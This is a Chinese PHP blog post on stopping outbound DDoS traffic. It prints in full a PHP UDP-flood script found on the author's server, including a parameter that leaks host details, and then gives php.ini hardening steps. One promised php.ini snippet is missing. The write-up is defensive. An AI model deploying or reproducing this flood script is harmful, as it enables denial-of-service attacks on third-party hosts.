php的ddos攻擊解決方法
本文實(shí)例講述了php的ddos攻擊解決方法。分享給大家供大家參考。具體分析如下:
今天自己的一臺(tái)機(jī)器突然向外部發(fā)送大量數(shù)據(jù)包,可每秒到1G以上,雖然我用策略把UDP禁止包是發(fā)不出去但是很占cup啊,所以想到最后還是想辦法解決了.
先看源碼,代碼如下:
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Parameters can not be empty!";
exit;
}
for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}
$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>
關(guān)鍵代碼在于如下:
方法很簡(jiǎn)單,向目標(biāo)主機(jī)發(fā)送UDP包,在加上定義無(wú)限死循環(huán),就會(huì)形成較大的壓力.
這個(gè)壓力是對(duì)于執(zhí)行這個(gè)腳本的服務(wù)器來(lái)說(shuō)的,因?yàn)樗紫葘?duì)自身的網(wǎng)寬、CPU等資源造成大量占用,如果想用這個(gè)腳本對(duì)目標(biāo)站點(diǎn)形成壓力,需要在多個(gè)服務(wù)器上執(zhí)行該腳本,DDOS嘛,既然是用fsockopen請(qǐng)求外部,那就不讓他請(qǐng)求.
php.ini里設(shè)置,代碼如下:
如果這樣他還是能發(fā)包,代碼如下:
extension=php_sockets.dll
改成
;extension=php_sockets.dll
重啟APACHE、IIS、NGINX,這樣就可以防止PHP DDOS發(fā)包了.
另外有網(wǎng)友說(shuō),讓腳本不允許設(shè)置為不超時(shí)很簡(jiǎn)單:
1. 把set_time_limit函數(shù)禁用
2. 啟用PHP的安全模式(safe_mode=on).
禁用socket函數(shù)可以把把socket模塊直接全部禁用也可以禁用fsockopen函數(shù),建議,由于socket常用于發(fā)送郵件找回密碼,因此建議開(kāi)啟直接開(kāi)啟安全模式,但是這樣的話,腳本每30秒超時(shí)一次,估計(jì)沒(méi)有哪個(gè)“黑客”寂寞到每30秒去點(diǎn)一下開(kāi)始DDOS.
經(jīng)驗(yàn):這種問(wèn)題一般是網(wǎng)站安全引起的,我們要注意網(wǎng)站的安全及服務(wù)器的安全,這樣就不容易被入侵了,如果會(huì)用macofee的朋友,對(duì)網(wǎng)站進(jìn)行限制一下就會(huì)更好一些.
希望本文所述對(duì)大家的php程序設(shè)計(jì)有所幫助。
相關(guān)文章
spl_autoload_register與autoload的區(qū)別詳解
本篇文章是對(duì)spl_autoload_register與autoload的區(qū)別進(jìn)行了詳細(xì)的分析介紹,需要的朋友參考下2013-06-06
php使用自定義函數(shù)實(shí)現(xiàn)漢字分割替換功能示例
這篇文章主要介紹了php使用自定義函數(shù)實(shí)現(xiàn)漢字分割替換功能,結(jié)合實(shí)例形式分析了php針對(duì)漢字的遍歷、轉(zhuǎn)換與分割操作相關(guān)技巧,需要的朋友可以參考下2017-01-01
php str_getcsv把字符串解析為數(shù)組的實(shí)現(xiàn)方法
下面小編就為大家?guī)?lái)一篇php str_getcsv把字符串解析為數(shù)組的實(shí)現(xiàn)方法。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧2017-04-04
PHP檢測(cè)數(shù)據(jù)類(lèi)型的幾種方法(總結(jié))
下面小編就為大家?guī)?lái)一篇PHP檢測(cè)數(shù)據(jù)類(lèi)型的幾種方法(總結(jié))。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧2017-03-03
php實(shí)現(xiàn)的遞歸提成方案實(shí)例
這篇文章主要介紹了php實(shí)現(xiàn)的遞歸提成方案,以完整實(shí)例形式較為詳細(xì)的分析了php提成方案的數(shù)據(jù)庫(kù)設(shè)計(jì)及功能實(shí)現(xiàn)技巧,涉及PHP數(shù)學(xué)運(yùn)算的相關(guān)技巧,需要的朋友可以參考下2015-11-11
PHP中最低級(jí)別的錯(cuò)誤類(lèi)型總結(jié)
在本篇文章里小編給大家整理的是一篇關(guān)于PHP中最低級(jí)別的錯(cuò)誤類(lèi)型總結(jié)內(nèi)容,對(duì)此有興趣的朋友們可以跟著學(xué)習(xí)下。2022-01-01
PHP的Yii框架中創(chuàng)建視圖和渲染視圖的方法詳解
這篇文章主要介紹了PHP的Yii框架中創(chuàng)建視圖和渲染視圖的方法詳解,包括CWidget小物件的講解及視圖中渲染另一個(gè)視圖的方法等,需要的朋友可以參考下2016-03-03
PHP實(shí)現(xiàn)HTML生成PDF文件的方法
這篇文章主要介紹了PHP實(shí)現(xiàn)HTML生成PDF文件的方法,可實(shí)現(xiàn)linux中利用HTML2FPDF與wkhtmltoimage把網(wǎng)頁(yè)html直接生成pdf格式的文件,需要的朋友可以參考下2014-11-11

